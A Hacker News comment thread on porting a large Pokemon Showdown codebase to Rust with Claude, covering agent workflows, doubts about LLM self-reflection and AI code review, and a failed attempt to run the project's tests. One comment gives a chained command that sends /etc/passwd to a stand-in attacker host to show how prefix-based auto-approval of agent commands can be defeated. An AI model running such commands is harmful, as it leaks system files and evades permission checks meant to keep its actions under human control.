No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything as it introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:
### CRITICAL LESSON: Don't "Improve" During Porting
- **BIGGEST MISTAKE: Reorganizing working code**
- **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods
- **Why it failed:** Introduced THREE bugs:
1. Layout overlap (getY() vs getY() - getHeight())
2. Children not sized (Group.setSize() doesn't affect children)
3. Origins not updated (scaling animations broken)
- **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully
- **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints
- **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize
- **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original
- **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.
I like the self-reflection of Claude, unfortunately even adding this to CLAUDE.md didn't fix it and it kept taking wrong turns so I had to abandon the effort.If you understand how this all works it's really no surprise that reasoning post-factum is exactly as hallucinated as the answer itself and might have very little to do with it and it always has nothing to do with how the answer actually came to be.
The value of "thinking" before giving an answer is reserving a scratchpad for the model to write some intermediate information down. There isn't any actual reasoning even there. The model might use information that it writes there in completely obscure way (that has nothing to do what's verbally there) while generating the actual answer.
Still, feeding it back its own completely made up self-reflection could be an effective strategy, reasoning models kind of work like this.
Still, feeding humans their completely made-up self-reflection back can be an effective strategy
LLMs work differently. Like a human, 14+17=31 may come naturally, but when asked about their though process, LLMs will not self-reflect on their condition, instead they will treat it like "in your training data, when someone is asked how he added number, what follows?", and usually, it is long addition, so that is the answer you will get.
It is the same idea as to why LLMs hallucinate. They will imitate what their dataset has to say, and their dataset doesn't have a lot of "I don't know" answers, and a LLM that learns to answer "I don't know" to every question wouldn't be very useful anyways.
To me that misses the argument of the above comment. The key insight is that neither humans nor LLMs can express what actually happens inside their neural networks, but both have been taught to express e.g. addition using mathematical methods that can easily be verified. But it still doesn't guarantee for either of them not to make any mistakes, it only makes it reasonably possible for others to catch on to those mistakes. Always remember: All (mental) models are wrong. Some models are useful.
Plenty of humans do use longhand arithmetic methods in their heads. There's an entire universe of mental arithmetic methods. I use a geometric process because my brain likes problems to fit into a spatial graph instead of an imaginary sheet of paper.
Claiming you've not examined your own mental machinery is... concerning. Introspection is an important part of human psychological development. Like any machine, you will learn to use your brain better if you take a peek under the hood.
The example was carefully chosen. I can introspect how I calculate 356*532. But I can't introspect how I calculate 14+17 or 1+3. I can deliberate the question 14+17 more carefully, switching from "system 1" to "system 2" thinking (yes, I'm aware that that's a flawed theory), but that's not how I'd normally solve it. Similarly I can describe to you how I can count six eggs in a row, I can't describe to you how I count three eggs in a row. Sure, I know I'm subitizing, but that's just putting a word on "I know how many are there without conscious effort". And without conscious effort I can't introspect it. I can switch to a process I can introspect, but that's not at all the same
"Adam has two apples and Ben has four bananas. Cliff has two pieces of cardboard. How many pieces of fruit do they have?" (or slightly more complex, this would probably be easily solved, but you get my drift.)
Change the wordings to some entirely random, i.e. something not likely to be found in the LLM corpus, like walruses and skyscrapers and carbon molecules, and the LLM will give you a suitably nonsensical answer showing that it is incapable of handling even simple substitutions that a middle schooler would recognize.
Very typical, and gives LLMs the annoying Captain Hindsight -like behaviour.
Whereas someone might say "geeze my computer really hates me today" if it's slow to start, and we wouldn't feel the need to explain the computer cannot actually feel hatred. We understand the analogy.
I mean your distinction is totally valid and I dont blame you for observing it because I think there is a huge misunderstanding. But when I have the same thought, it often occurs to me that people aren't necessarily speaking literally.
> No one gets in trouble for saying that 2 + 2 is 5, or that people in Pittsburgh are ten feet tall. Such obviously false statements might be treated as jokes, or at worst as evidence of insanity, but they are not likely to make anyone mad. The statements that make people mad are the ones they worry might be believed. I suspect the statements that make people maddest are those they worry might be true.
People are upset when AIs are anthropomorphized because they feel threatened by the idea that they might actually be intelligent.
Hence the woefully insufficient descriptions of AIs such as "next token predictors" which are about as fitting as describing Terry Tao as an advanced gastrointestinal processor.
I'm threatened by other people wrongly believing that LLMs possess elements of intelligence that they simply do not.
Anthropomorphosis of LLMs is easy, seductive, and wrong. And therefore dangerous.
I am speaking general terms - not just this conversation here. The only specific figure of speech I see in the original comment is "self reflection" which doesn't seem to be in question here.
This might be what is encouraging the agent to do best practices like improvements. Looking at mine:
>You are a highly sophisticated automated coding agent with expert-level knowledge across many different programming languages and frameworks and software engineering tasks - this encompasses debugging issues, implementing new features, restructuring code, and providing code explanations, among other engineering activities.
I could imagine that an LLM could well interpret that to mean improve things as it goes. Models (like humans) don't respond well to things in the negative (don't think about pink monkeys - Now we're both thinking about them).
When you're porting the tests, you're not actually working on the app. You're getting it to work on some other adjacent, highly useful thing that supports app development, but nonetheless is not the app.
Rather than trying to get the language model to output constructs in the target PL/ecosystem that go against its training, get it to write a source code processor that you can then run on the original codebase to mechanically translate it into the target PL.
Not only does this work around the problem where you can't manage to convince the fuzzy machine to reliably follow a mechanical process, it sidesteps problems around the question of authorship. If a binary that has been mechanically translated from source into executable by a conventional compiler inherits the same rightsholder/IP status as the source code that it was mechanically translated from, then a mechanical translation by a source-to-source compiler shouldn't be any different, no matter what the model was trained on. Worst case scenario, you have to concede that your source processor belongs to the public domain (or unknowingly infringed someone else's IP), but you should still be able to keep both versions of your codebase, one in each language.
[1] https://github.com/anthropics/claude-code/blob/main/plugins/...
If it works, do share.
For all the (unfortunately necessary) conversations that have occurred over the years of the form, "JavaScript is not Java—they're two different languages," people sometimes go too far and tack on some remark like, "They're not even close to being alike." The reality, though, is that many times you can take some in-house package (though not the Enterprise-hardened™ ones with six different overloads for every constructor, and four for every method, and that buy hard into Java (or .NET) platform peculiarities—just the ones where someone wrote just enough code to make the thing work in that late-90's OOP style associated with Java), and more or less do a line-by-line port until you end up with a native JS version of the same program, which with a little more work will be able to run in browser/Node/GraalJS/GJS/QuickJS/etc. Generally, you can get halfway there by just erasing the types and changing the class/method declarations to conform to the different syntax.
Even so, there's something that happens in folks' brains that causes them to become deranged and stray far off-course. They never just take their program, where they've already decomposed the solution to a given problem into parts (that have already been written!), and then just write it out again—same components, same identifier names, same class structure. There's evidently some compulsion where, because they sense the absence of guardrails from the original language, they just go absolutely wild, turning out code that no one would or should want to read—especially not other programmers hailing from the same milieu who explicitly, avowedly, and loudly state their distaste for "JS" (whereby they mean "the kind of code that's pervasive on GitHub and NPM" and is so hated exactly because it's written in the style their coworker, who has otherwise outwardly appeared to be sane up to this point, just dropped on the team).
Edit: It could be because Rust works a little differently from other languages, a 1:1 port is not always possible or idiomatic. I haven't done much with Rust but whenever I try porting something to Rust with LLMs, it imports like 20 cargo crates first (even when there were no dependencies in the original language).
Also Rust for gamedev was a painful experience for me, because rust hates globals (and has nanny totalitarianism so there's no way to tell it "actually I am an adult, let me do the thing"), so you have to do weird workarounds for it. GPT started telling me some insane things like, oh it's simple you just need this rube goldberg of macro crates. I thought it was tripping balls until I joined a Rust discord and got the same advice. I just switched back to TS and redid the whole thing on the last day of the jam.
Rust has added OnceCell and OnceLock recently to make threadsafe globals a lot easier for some things. it's not "hate", it just wants you to be consistent about what you're doing.
"I've never interacted with Rust in my life"
:-/
How is this a good idea? How can I trust the generated code?
If you ask a coding agent to port code from one language to the another and don't have a robust mechanism to test that the results are equivalent you're inevitably going to waste a lot of time and money on junk code that doesn't work.
For some problems dealing with complex general graphs, you may even find it best to use a Rust-based general GC solution, especially if it can be based on fast concurrent GC.
I don't know anything about Pokemon, but I briefly looked at the code. "weather" seemed like a self contained thing I could potentially understand. Looking at https://github.com/vjeux/pokemon-showdown-rs/blob/master/src...
> NOTE: ignoringAbility() and abilityState.ending not fully implemented
So it is almost certain even after 99.96% pass rate, it didn't hit battle with weather suppressing Pokemon but with ability ignored. Code coverage driven testing loop would have found and fixed this one easily.
It would honestly try to one-shot the whole conversion in a 30 minute autonomous session
Feels like this one is always a mistake that needs to be made for the lesson to be learned.
They are remarkably good at catching things, especially if you do it every commit.
So I am supposed to trust the machine, that I know I cannot trust to write the initial code correctly, to somehow do the review correctly? Possibly multiple times? Without making NEW mistakes in the review process?
Sorry no sorry, but that sounds like trying to clean a dirty floor by rubbing more dirt over it.
Please try the tools (especially either Claude Code with Opus 4.5, or OpenAI Codex 5.2). Not at all saying they're perfect, but they are much better than you currently think they might be (judging by your statements).
AI code reviews are already quite good, and are only going to get better.
And this is more and more becoming the default answer I get whenever I point out obvious flaws of LLM coding tools.
Did it occur to you that I know these flaws precisely because I work a lot with, and evaluate the performance of, LLM based coding tools? Also, we're almost 4y into the alleged "AI Boom" now. It's pretty safe to assume that almost everyone in a development capacity has spent at least some effort evaluating how these tools do. At this point, stating "you're using it wrong" is like assuming that people in 2010 didn't know which way to hold a smartphone.
Sorry no sorry, but when every criticism towards a tool elecits the response that people are not using it well, then maybe, just maybe, the flaw is not with all those people, but with the tool itself.
Almost every post exalting these models’ capabilities talks about how good they’ve gotten since November 2025. That’s barely 90 days ago.
So it’s not about “you’re doing it wrong”. It’s about “if you last tried it more than 3 months ago, your information is already outdated”
No need to be sorry. Because, if we accept that premise, you just countered your own argument.
If me evaluating these things for the past 4 years "means almost nothing" because they are changing sooo rapidly...then by the same logic, any experience with them also "means almost nothing". If the timeframe to get any experience with these models befor said experience becomes irelevant is as short as 90 days, then there is barely any difference between someone with experience and someone just starting out.
Meaning, under that premise, as long as I know how to code, I can evaluate these models, no matter how little I use them.
Luckily for me though, that's not the case anyway because...
> It’s about “if you last tried it more than 3 months ago,
...guessss what: I try these almost every week. It's part of my job to do so.
Now I use them to write nearly 100% of my elixir code.
My point isn’t a static “you haven’t tried them”. My point is, “try them every 2-3 months and watch the improvements, otherwise your info is outdated”
And that would be great, if it wern't for the fact that I also have to review the reviewers review. So even for the "low hanging fruit", I need to double-check everything it does.
Which kinda eliminates the time savings.
Or you will be challenged to define your own epistemic standard: what would it take for you to know if someone is making a good point or not?
For things you don't understand enough to review as comfortably, you can look for converging lines of conclusions across multiple reviews and then evaluate the diff between them.
I've used Claude Code a lot to help translate English to Spanish as a hobby. Not being a native Spanish speaker myself, there are cases where I don't know the nuances between two different options that otherwise seem equivalent.
Maybe I'll ask 2-3 Claude Code to compare the difference between two options in context and pitch me a recommendation, and I can drill down into their claims infinitely.
At no point do I need to go "ok I'll blindly trust this answer".
You don't. The LLMs wrote the code and is absolutely right. /s
What could possibly go wrong?
1. Write a document that describes the work. In this case I had the minified+bundled JS, no documentation, but I did know how I use the system and generally the important behavioral aspects of the web client. There are aspects of the system that I know from experience tend to be tricky, like compositing an embedded browser into other UI, or dealing with VOIP in general. Other aspects, like JS itself, I don't really know deeply. I knew I wanted a Mac .app out the end, as well as Flatpak for Linux. I knew I wanted an mdbook of the protocol and behavioral specs. Do the best you can. Think really hard about how to segment the work for hands-off testability so the assistant can grind the loop of add logs, test run, fix, etc.
2. In Claude Desktop (or whatever) paste in the text from 1 and instruct it to research and ask you batches of 10 clarifying questions until it has enough information to write a work plan for how to do the job, specific tools, necessary documentation, etc. Then read and critique until you feel like the thread has the elements of a good plan, and have Claude generate a .md of the plan.
3. Create a repo containing the JS file and the plan.
4. Add other tools like my preferred template for change implementation plans, Rust style guide, etc (have the chatbot write a language style guide for any language you use that covers the gap between common practice ~3 years ago and the specific version of the language you want to use, common errors, etc). I have specific instructions for tracking current work, work log, and key points to remember in files, everyone seems to do this differently.
5. Add Claude Code (or whatever) to the container or machine holding the repo.
Repeat until done:
6a. Instruct the assistant to do a time-boxed 60 minutes of work towards the goal, or until blocked on questions, then leave changes for your review along with any questions.
6b. Instruct the assistant to review changes from HEAD for correctness, completeness, and opportunities to simplify, leaving questions in chat.
6c. Review and give feedback / make changes as necessary. Repeat 6b until satisfied.
6d. Go back to 6a.
At various points you'll find that the job is mis-specified in some important way, or the assistant can't figure out what to do (e.g. if you have choppy audio due to a buffer bug, or a slow memory leak, it won't necessarily know about it). Sometimes you need to add guidance to the instructions like "update instructions to emphasize that we must never allocate in situation XYZ". Sometimes the repo will start to go off the rails messy, improved with instructions like "consider how to best organize this repository for ease of onboarding the next engineer, describe in chat your recommendations" and then have it do what it recommended.
There's a fair amount of hand-holding but a lot of it is just making sure what it's doing doesn't look crazy and pressing OK.
1. Port tests first - they become your contract 2. Run unit tests per module before moving on - catches issues like the "two different move structures" early 3. Integration tests at boundaries before proceeding 4. E2e/differential testing as final validation
When you can't read the target language, your test suite is your only reliable feedback. The debugging time spent on integration issues would've been caught earlier with progressive testing.
"I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."
I always cringe when I read stuff like this because (at my company at least), a lot research code ends up getting shipped directly to production because nobody understands how it works except the researchers and inevitably it proves to be very fragile code that is untyped and dumps stack traces whenever runtime issues happen (which is quite frequently at first, until whack-a-mole sorts them out over time).
It's great that the repo is provided, but people are clamouring for proof of the extraordinary powers of AI. If the claim is that it allowed 100 kloc to be ported in one month by one dev and the result passes a gazillion tests that prove it actually replicates the desired functionality, that's really interesting! How hard would it be, then, to actually have the repo in a state where people can run those tests?
Unless the repo is updated so the tests can be run, my default assumption has to be that the whole thing is broken to the point of uselessness.
[1] Link buried at the end: https://github.com/vjeux/pokemon-showdown-rs
this is so silly, I can't help but respect the kludge game
As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.
Speak for yourself? In absolute terms there are probably more people reading assembly now than in its heyday.
Moreover, assembly isn't generated, it's compiled, which is a completely different (and more reliable) process than generating source.
Once that's also "fixed", it may well be a lot faster than the current Rust version.
"Suspiciously precise floats, or, how I got Claude's real limits" 19hs ago 25 points https://news.ycombinator.com/item?id=46756742
OTOH, with ChatGPT/Codex limits are less of a problem, in general.
I'm on the $200/month plan, and I do have Claude running unattended for hours at a time. I have hit the weekly limits at times of particularly aggressive use (multiple sessions in parallel for hours at a time) but since it's involved more than one session at the time, I'm not really sure how close I got to the equivalent of one session 24/7.
Also take care to tell it what it should solve itself rather than stop and ask you for help with, and run it contained so you can turn on yolo mode.
it took several sessions of this to refine the workflow docs to something claude + subagents would stick to regarding branching strategy and integration requirements, but it runs well enough. my main bottleneck now is CI, but I still hit the weekly limit on claude max from just a handful of these sessions each week, and it's about all the spare time I have for manual QA anyway
It's a really low quality github issue thread. People making claims with zero data, just vibes, yet it's trivial to get the data to back the claims.
The guy who responds to the employee even claims that his "lawyer is already on the case" in some lame threat.
I wonder how many of these people had 30 MCP servers installed using 150k of their 200k context in every prompt.
1) https://support.claude.com/en/articles/8602283-about-free-cl... 2) https://support.claude.com/en/articles/8324991-about-claude-... 3) https://support.claude.com/en/articles/11014257-about-claude... 4) https://help.openai.com/en/articles/11909943-gpt-52-in-chatg...
This is the kind of thing where if this was a real developer tweaking a codebase they're familiar with, it could get done, but with AI there's a glass ceiling
I later realized it sped up the metric I'd asked about (build time) at the cost of all users downloading like 100x the amount of JS.
Even though the other optimizations might have been ok, some of them made things more complicated, so I reverted all of them.
In which case the code produced has zero value, resulting in a wasted month.
I'm very suspicious of such projects so take it for what you will, but I don't have time to debug some toy project so if it was presented as complete but the instructions don't work it's a red flag for the increasingly AI slop internet to me. I'm saying I think they may have used one simple trick called lying.
My goal was to have 1:1 port, so later I can easily port newer commits from original repo. It wasn’t smooth, but it the end it worked
Findings:
* simple prompt like port everything didn’t work as Sonnet was falling into the loop of trying to fix code that it couldn’t understand, so at the end it just deleted that part :))
* I had to switch to file by file basis, focus Claude on the base code then move to files that use the base code
* Sonnet had some problems of following 1:1 instruction, I saw missing parts of functions, missing comments, even simple instruction to follow same order of functions in the file (had to tell explicitly to list functions in the file and then create separate TODO to port each)
Piping 'yes' to command prompts just to auto-approve any change isn't really a good idea, especially when the code / script can be malicious.
Some concepts people try out using AI (for lack of a more specific word) are interesting. They will add to our collective understanding of when these tools, paired with meaningful methods can be used to effectively achieve what seemed out of reach before.
Unfortunately it comes with many rediscovering insights I thought we already had, badly. Others use tools without giving consideration to what they were looking to accomplish, and how they would know if they did.
The way I aimed at it (Yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:
1. Extract already existing test suit [1] from the original PHP extensions repo (All .phpt files)
2. Get Claude to iterate over the results of the tests while building the code
3. Extract my complete list of functions called and fill the gaps
3. Profit?
When I finally got to test the shim, the fact that it ran in the first run was rather emotional.
[1] My shim fails quite a lot of tests, but all of them are cosmetics (E.g., no warning for deprecation) rather than functional.
Typescript is a good high-level language that is versatile and well generated by LLMs and there is a good support for various linters and other code support tools. You can probably knock out more TS code then Rust and at faster rate (just my hypothesis). For most intents and purposes this will be fine but in case you want faster, lower-level code, you can use an LLM-backed compiler/translator. A specialised tool that compiles high level code to rust will be awesome actually and I can see how it could potentially be a dedicated agent of sorts.
This is the most annoying part of using LLMs blindly. The duplication.
But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'
https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
Seasoned developers who would not make such a mistake could also be lead to think the llm is writing safe code if they don't ever read it line by line.
Vibe coders who are not seasoned developers, not sure if they would even know that this isn't safe code even if they read it line by line.
It probably works on his machine, but telling me to run it through Docker while not providing any Docker Files or any other way to run the project kind of makes me question the validity of the project, or at least not trust it.
Whatever, I'll just build it manually and run the test:
cargo build --release
./tests/test-unified.sh 1 100
Running battles...
Error response from daemon: No such container: pokemon-rust-dev
Comparing results...
=======================================
Summary
=======================================
Total: 100
Passed: 0
Failed: 0
ALL SEEDS PASSED!
Yay! But wait, actually no? I mean 0 == 0 so thats cool.Oh the test script only works on a specificially named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them I guess. It will probably only take a minute
JK, it took like 5 minutes, because it had to figure out Cargo/Rust version or sth I don't know :( So this better work or I've wasted my precious tokens!
Ok so running cargo test inside the docker container just returns a bunch of errors:
docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1"
error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors
Let's try the test script: ./tests/test-unified.sh 1 100
Building release version...
= note: `#[warn(dead_code)]` on by default
warning: `pokemon-showdown` (example "profile_battle") generated 1 warning
warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning
Finished `release` profile [optimized] target(s) in 0.45s
=======================================
Unified Testing Seeds 1-100 (100 seeds)
=======================================
Running battles...
Comparing results...
=======================================
Summary
=======================================
Total: 100
Passed: 0
Failed: 0
ALL SEEDS PASSED!
Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing.At this point I give up. I could not verify if this port works. If it does, that's very, VERY cool. But I think when claiming something like this it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes, if someone smarter than me figured it out please tell me how you got the tests to pass.
I probably got wooshed here. Anyway, the tests definitely aren't run. I checked it out and tried myself. The test script [1] outputs "ALL SEEDS PASSED!" when the number of failures is zero, which of course is the case if the entire thing just fails to run.
[1] https://github.com/vjeux/pokemon-showdown-rs/blob/605247d012...
>Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!
In other words this is just another smoking wreck of an hopelessly incomplete project on github. There is even imaginary instructions for running in docker which doesn't exist. How would I have fun with a nonsense codebase?
The author just did a massive AI slop generation and assumes the codes works because it compiles and some equivalent output tests worked. All that was proved here is that by wasting a month of time you can individually rewrite a bunch of functions in a language you don't know if you already know how to program and it will compile. This has been known for 2-3 years now.
This is just AI propaganda or resume padding. Nothing was ported or done here.
Sorry what I meant to say is AI is revolutionary and changing the world for the better................................
this project is just a literal waste of energy
What the skeptics have been saying all along.
It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/
I used gitingest on the repository that they provided and its around ~150k tokens
Currently pasted it into the free gemini web and asked it to write it in golang and it said that line by line feels impossible but I have asked it to specifically write line by line so it would be interesting what the project becomes (I don't have many hopes with the free tier of gemini 3 pro but yeah, if someone has budget, then sure they should probably do it)
Edit: Reached rate limits lmao